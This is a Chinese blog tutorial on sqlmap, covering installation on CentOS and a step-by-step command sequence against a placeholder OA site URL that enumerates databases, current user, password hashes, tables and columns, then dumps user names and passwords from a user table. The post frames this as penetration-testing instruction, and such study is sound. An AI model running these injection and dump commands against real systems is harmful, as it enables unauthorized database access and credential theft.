渗透测试工具之sqlmap

忘是亡心i 2022-02-26 03:44 628阅读 0赞

渗透测试是一种利用模拟黑客攻击的方式来评估计算机网络系统安全性能的方法。

渗透测试工具很多，其中sqlmap 是一个开源的渗透测试工具，可以用来进行自动化的检测，利用SQL注入漏洞，获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项，包括获取数据库中存储的数据，访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。

本文介绍CentOS下（sqlmap可以运行在 Python 2.6.x 和 2.7.x 版本的任何平台上）sqlmap工具的安装和简单使用。

一、sqlmap安装

安装python： yum install python

访问http://sqlmap.org/ 下载sqlmap，github地址为 https://github.com/sqlmapproject/sqlmap/，解压缩即可使用

# wget https://github.com/sqlmapproject/sqlmap/zipball/master -O sqlmap.zip

# unzip sqlmap.zip

# cd sqlmapproject-sqlmap-49586ad/

二、sqlmap使用

1、尝试获取数据库实例列表 —dbs
python sqlmap.py -u “https://oa.test.com/form/detail.html?id=393a&key=0e41bd2e“ —dbs
sqlmap会利用上面url中的参数id和key尝试注入不同的sql脚本进行sql注入的攻击，如果攻击成功会列出所有的数据库列表

2、尝试获取当前数据库的用户名 —current-user

python sqlmap.py -u “https://oa.test.com/form/detail.html?id=393a&key=0e41bd2e“ —current-user

3、尝试获取当前数据库的密码 —passwords

python sqlmap.py -u “https://oa.test.com/form/detail.html?id=393a&key=0e41bd2e“ —passwords

4、尝试获取数据库的表 —tables

python sqlmap.py -u “https://oa.test.com/form/detail.html?id=393a&key=0e41bd2e“ -D test_oa —tables

如果通过—dbs参数获取到了数据库实例为test_oa，再执行上面的带有—tables的命令，如果攻击成功将列出库中所有的表

5、尝试获取数据库表的所有列 —columns

python sqlmap.py -u “https://oa.test.com/form/detail.html?id=393a&key=0e41bd2e“ -D test_oa -T oa_user —columns

如果上一步通过—tables参数获取到了有一个oa_user表，那么使用—columns参数，如果攻击成功将列出oa_user表中的所有列

6、尝试获取表的数据

python sqlmap.py -u “https://oa.test.com/form/detail.html?id=393a&key=0e41bd2e“ -D test_oa -T oa_user -C “user_name,password” —start 1 —stop 10 —dump

如果上一步通过—columns参数获取到了有user_name和password列，那么通过指定-C参数，如果攻击成功将列出部分或全部数据

上面列出的都是get请求，如果需要执行post带参数的请求可以加上 -data 参数，即可。

还可以结合burpsuite辅助sqlmap做post测试，burpsuite抓包保存到文件中，sqlmap使用-r file通过文件传递请求参数

发表评论取消回复

表情：

评论列表（有 0 条评论，628人围观）

还没有评论，来说两句吧...

相关阅读

相关 sqlmap跑宽字节注入(渗透测试之SQL注入之宽字节注入)

宽字节注入就是用一个大于128的十六进制数来吃掉转义符，gbk编码，字节作为一个字符的编码手工注入一、什么是宽字节注入宽字节是相对于ascII这样单字节而言的；像

今天药忘吃喽~/ 2023年09月26日 10:38/ 0 赞/ 165 阅读

相关自动化渗透测试工具

一、程序概要程序主要功能有自动发现、监测资产信息、自动匹配Poc进行检测、自动服务认证进行爆破、自动进行Web渗透，获取web指纹、漏洞等。二、部署安装 2

向右看齐/ 2022年12月23日 06:46/ 0 赞/ 476 阅读

相关渗透测试工具之：BurpSuite

Burp Suite 能高效率地与多个工具一起工作，例如：一个中心站点地图是用于汇总收集到的目标应用程序信息，并通过确定的范围来指导单个程序工作。在一个工具处理HTTP 请

心已赠人/ 2022年12月19日 00:43/ 0 赞/ 356 阅读

相关渗透测试学习工具

> 本文转自网络文章，内容均为非盈利，版权归原作者所有。 > 转载此文章仅为个人收藏，分享知识，如有侵权，马上删除。 > > 原文作者：yunying > 原文地址：

灰太狼/ 2022年12月03日 05:29/ 0 赞/ 408 阅读

相关 sqlmap工具之参数使用

文章目录 sqlmap-参数使用 sqlmap-基础实验实验目的实验环境实验内容

r囧r小猫/ 2022年09月02日 13:53/ 0 赞/ 382 阅读

相关渗透测试工具sqlmap基础教程

转载请注明出处：http://blog.csdn.net/zgyulongfei/article/details/41017493 作者：羽龍飛本文仅

深碍√TFBOYSˉ_/ 2022年08月21日 01:17/ 0 赞/ 376 阅读

相关渗透测试工具之zenmap

ZenMap是安全扫描工具NMap的一个官方的图形用户界面，是一个跨平台的开源应用，不仅初学者容易使用，同时为高级使用者提供了很多高级特性。频繁的扫描能够被存储，进行重复运

秒速五厘米/ 2022年02月26日 04:17/ 0 赞/ 1592 阅读

相关渗透测试工具之sqlmap

渗透测试是一种利用模拟黑客攻击的方式来评估计算机网络系统安全性能的方法。渗透测试工具很多，其中sqlmap 是一个开源的渗透测试工具，可以用来进行自动化的检测，利用SQL注

忘是亡心i/ 2022年02月26日 03:44/ 0 赞/ 629 阅读

相关渗透测试工具SQLmap

一、简介 SQLmap 是一款用 Python 编写的开源渗透测试工具，用来自动检测和利用 SQL 注入漏洞。二、Windows 下安装 2.1 安装 Pyth

怼烎@/ 2022年01月07日 14:19/ 0 赞/ 600 阅读

相关渗透测试——sql注入神器-sqlmap 安装及使用

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

柔情只为你懂/ 2021年07月25日 21:20/ 1 赞/ 2051 阅读